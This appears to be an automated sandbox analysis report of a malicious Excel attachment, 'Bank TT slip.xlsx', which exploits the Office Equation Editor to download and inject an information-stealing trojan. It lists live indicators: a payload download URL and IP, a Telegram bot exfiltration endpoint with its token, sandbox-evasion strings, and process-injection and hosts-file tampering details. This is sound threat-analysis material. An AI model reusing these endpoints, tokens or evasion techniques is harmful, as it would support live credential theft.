                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002EC132 push edx; ret
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E8168 push ebx; ret
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C702F push ss; iretd
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C597F push eax; retf 0017h
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C029C push esp; ret
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C1359 pushfd ; iretd
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.02001355184
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exe
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exe
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036805F7 URLDownloadToFileW,ShellExecuteExW,ExitProcess,

                    Boot Survival

                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exe
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2404, type: MEMORYSTR
                    Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                    Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2648Thread sleep time: -420000s >= -30000s
                    Source: C:\Users\Public\vbc.exe TID: 316Thread sleep time: -60000s >= -30000s
                    Source: C:\Users\Public\vbc.exe TID: 2428Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 9258
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 504
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 30000
                    Source: EQNEDT32.EXE, 00000002.00000002.962418834.0000000000384000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ??\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
                    Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                    Source: EQNEDT32.EXE, 00000002.00000002.962329452.000000000035B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                    Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                    Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                    Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                    Source: vbc.exe, 00000004.00000002.987344182.0000000002694000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0368067D mov edx, dword ptr fs:[00000030h]
                    Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                    Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
                    Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 438000
                    Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43A000
                    Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\Public\vbc.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
                    Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
                    Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Lowering of HIPS / PFW / Operating System Security Settings

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Windows\System32\drivers\etc\hosts

                    Stealing of Sensitive Information

                    Source: Yara matchFile source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2404, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTR
                    Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.vbc.exe.35b1ce0.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.vbc.exe.35b1ce0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.vbc.exe.34c6060.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000000.984768491.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.984407856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.985108064.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.985373041.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1167403403.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.987730954.000000000341F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2404, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTR
                    Source: Yara matchFile source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match, File source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: vbc.exe PID: 2404, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTR
                    Source: Yara match, File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 5.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 5.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 4.2.vbc.exe.35b1ce0.4.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 4.2.vbc.exe.35b1ce0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 4.2.vbc.exe.34c6060.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 00000005.00000000.984768491.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000005.00000000.984407856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000005.00000000.985108064.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000005.00000000.985373041.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000005.00000002.1167403403.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000004.00000002.987730954.000000000341F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: vbc.exe PID: 2404, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTR
                    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                    Valid Accounts211
                    Windows Management Instrumentation
                    Path Interception311
                    Process Injection
                    111
                    Masquerading
                    OS Credential Dumping311
                    Security Software Discovery
                    Remote Services11
                    Archive Collected Data
                    Exfiltration Over Other Network Medium1
                    Web Service
                    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts1
                    Scripting
                    Boot or Logon Initialization Scripts1
                    Extra Window Memory Injection
                    1
                    File and Directory Permissions Modification
                    LSASS Memory131
                    Virtualization/Sandbox Evasion
                    Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
                    Encrypted Channel
                    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain Accounts23
                    Exploitation for Client Execution
                    Logon Script (Windows)Logon Script (Windows)1
                    Disable or Modify Tools
                    Security Account Manager1
                    Application Window Discovery
                    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration33
                    Ingress Tool Transfer
                    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)131
                    Virtualization/Sandbox Evasion
                    NTDS1
                    Remote System Discovery
                    Distributed Component Object ModelInput CaptureScheduled Transfer2
                    Non-Application Layer Protocol
                    SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script311
                    Process Injection
                    LSA Secrets1
                    File and Directory Discovery
                    SSHKeyloggingData Transfer Size Limits22
                    Application Layer Protocol
                    Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common1
                    Deobfuscate/Decode Files or Information
                    Cached Domain Credentials114
                    System Information Discovery
                    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                    Scripting
                    DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job2
                    Obfuscated Files or Information
                    Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)2
                    Software Packing
                    /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                    Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                    Extra Window Memory Injection
                    Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Behavior Graph ID: 626166, Sample: Bank TT slip.xlsx, Startdate: 13/05/2022, Architecture: WINDOWS, Score: 100 (graph recovered as a process tree from the graph layout):

                    Start
                        DNS/IP: api.telegram.org
                        Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 16 other signatures
                        started: EQNEDT32.EXE 12
                            DNS/IP: 172.245.27.27, 49171, 80, AS-COLOCROSSINGUS, United States
                            dropped: C:\Users\user\AppData\Local\...\SOA[1].exe, PE32
                            dropped: C:\Users\Public\vbc.exe, PE32
                            Signatures: Office equation editor establishes network connection; Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                            started: vbc.exe 1 5
                                Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Writes to foreign memory regions; 2 other signatures
                                started: RegSvcs.exe 2
                                    dropped: C:\Windows\System32\drivers\etc\hosts, ASCII
                                    Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines); Modifies the hosts file
                        started: EXCEL.EXE 33 24
                            dropped: C:\Users\user\Desktop\~$Bank TT slip.xlsx, data

                    Source | Detection | Scanner | Label | Link
                    Bank TT slip.xlsx | 20% | Metadefender | | Browse
                    Bank TT slip.xlsx | 32% | ReversingLabs | Document-Office.Exploit.CVE-2018-0802 |
                    Source | Detection | Scanner | Label | Link
                    C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exe | 46% | ReversingLabs | Win32.Trojan.Lazy |
                    C:\Users\Public\vbc.exe | 46% | ReversingLabs | Win32.Trojan.Lazy |
                    Source | Detection | Scanner | Label | Link | Download
                    5.0.RegSvcs.exe.400000.4.unpack | 100% | Avira | TR/Spy.Gen8 | | Download File
                    5.0.RegSvcs.exe.400000.1.unpack | 100% | Avira | TR/Spy.Gen8 | | Download File
                    5.0.RegSvcs.exe.400000.2.unpack | 100% | Avira | TR/Spy.Gen8 | | Download File
                    5.0.RegSvcs.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8 | | Download File
                    5.2.RegSvcs.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1203035 | | Download File
                    5.0.RegSvcs.exe.400000.3.unpack | 100% | Avira | TR/Spy.Gen8 | | Download File
                    No Antivirus matches
                    Source | Detection | Scanner | Label | Link
                    http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe |
                    http://DynDns.comDynDNS | 0% | URL Reputation | safe |
                    http://172.245.27.27/SOA.exe | 100% | Avira URL Cloud | malware |
                    Http://172.245.27.27/SOA.exeK | 100% | Avira URL Cloud | malware |
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe |
                    http://172.245.27.27/SOA.exeX | 100% | Avira URL Cloud | malware |
                    http://172.245.27.27/SOA.exehhC: | 100% | Avira URL Cloud | malware |
                    Http://172.245.27.27/SOA.exej | 100% | Avira URL Cloud | malware |
                    https://api.ipify.org%GETMozilla/5.0 | 0% | URL Reputation | safe |
                    http://bLHfhV.com | 0% | Avira URL Cloud | safe |
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe |
                    http://172.245.27.27/SOA.exeB | 100% | Avira URL Cloud | malware |
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    api.telegram.org | 149.154.167.220 | true | false | | high
                      Name | Malicious | Antivirus Detection | Reputation
                      http://172.245.27.27/SOA.exe | true | Avira URL Cloud: malware | unknown
                      Name | Source | Malicious | Antivirus Detection | Reputation
                      http://127.0.0.1:HTTP/1.1 | RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
                      http://DynDns.comDynDNS | RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      Http://172.245.27.27/SOA.exeK | EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://172.245.27.27/SOA.exeX | EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
                      http://172.245.27.27/SOA.exehhC: | EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
                      Http://172.245.27.27/SOA.exej | EQNEDT32.EXE, 00000002.00000002.962678277.0000000003680000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
                      https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/ | vbc.exe, 00000004.00000002.987730954.000000000341F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000000.984768491.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000000.984407856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.1167403403.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high
                      https://api.ipify.org%GETMozilla/5.0 | RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | low
                      http://bLHfhV.com | RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                      https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendDocumentdocument----- | RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | vbc.exe, 00000004.00000002.987730954.000000000341F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000000.984768491.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000000.984407856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.1167403403.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://172.245.27.27/SOA.exeB | EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
                          IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                          172.245.27.27 | unknown | United States | | 36352 | AS-COLOCROSSINGUS | true
                          Joe Sandbox Version:34.0.0 Boulder Opal
                          Analysis ID:626166
                          Start date and time: 13/05/2022 16:57:00 (2022-05-13 16:57:00 +02:00)
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 8m 16s
                          Hypervisor based Inspection enabled:false
                          Report type:light
                          Sample file name:Bank TT slip.xlsx
                          Cookbook file name:defaultwindowsofficecookbook.jbs
                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                          Number of analysed new started processes:6
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.troj.adwa.expl.evad.winXLSX@6/18@1/1
                          EGA Information:
                          • Successful, ratio: 66.7%
                          HDC Information:
                          • Successful, ratio: 2.6% (good quality ratio 1.5%)
                          • Quality average: 28.2%
                          • Quality standard deviation: 26.9%
                          HCA Information:
                          • Successful, ratio: 97%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Found application associated with file extension: .xlsx
                          • Adjust boot time
                          • Enable AMSI
                          • Found Word or Excel or PowerPoint or XPS Viewer
                          • Attach to Office via COM
                          • Scroll down
                          • Close Viewer
                          • Exclude process from analysis (whitelisted): dllhost.exe
                          • TCP Packets have been reduced to 100
                          • Execution Graph export aborted for target RegSvcs.exe, PID 1452 because it is empty
                          • Report size getting too big, too many NtCreateFile calls found.
                          • Report size getting too big, too many NtEnumerateValueKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • VT rate limit hit for: Bank TT slip.xlsx
                          Time | Type | Description
                          16:57:42 | API Interceptor | 77x Sleep call for process: EQNEDT32.EXE modified
                          16:57:46 | API Interceptor | 69x Sleep call for process: vbc.exe modified
                          16:57:57 | API Interceptor | 750x Sleep call for process: RegSvcs.exe modified
                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:downloaded
                          Size (bytes):833024
                          Entropy (8bit):7.018221482722969
                          Encrypted:false
                          SSDEEP:12288:7HE2ISZ5m4fuOjUTPXmkHz/b9m+DhLrRvoXSf+bnl8tTac2aVzBQXOCmxqogCSsV:b3NUXmkTjZFRvoCmblML
                          MD5:F18604D5FC3E2930E85C403E0E80A459
                          SHA1:AA0517C10C333F9A9A64EBA154EA915464EBF2BB
                          SHA-256:46584937F3C753886BB38030047DD11C73D46BF01C5E52A95118108634EE2081
                          SHA-512:C39BD01BCA62779434B0508BC66972CD7030153469F631B425E1B77AF59FD7DB1A26A837EA2B7440C9F93CD538C43C2F2005EBCF34B982C03CEED71A4C3B685C
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 46%
                          Reputation:low
                          IE Cache URL:http://172.245.27.27/SOA.exe
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....|b..............P.................. ........@.. ....................... ............@.....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............?...........f...............................................*..(#...*&..($....*.s%........s&........s'........s(........s)........*Z........o1...........*&..(2....*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{..
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                          Category:dropped
                          Size (bytes):2647
                          Entropy (8bit):7.8900124483490135
                          Encrypted:false
                          SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
                          MD5:E46357D82EBC866EEBDA98FA8F94B385
                          SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
                          SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
                          SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
                          Malicious:false
                          Reputation:high, very likely benign file
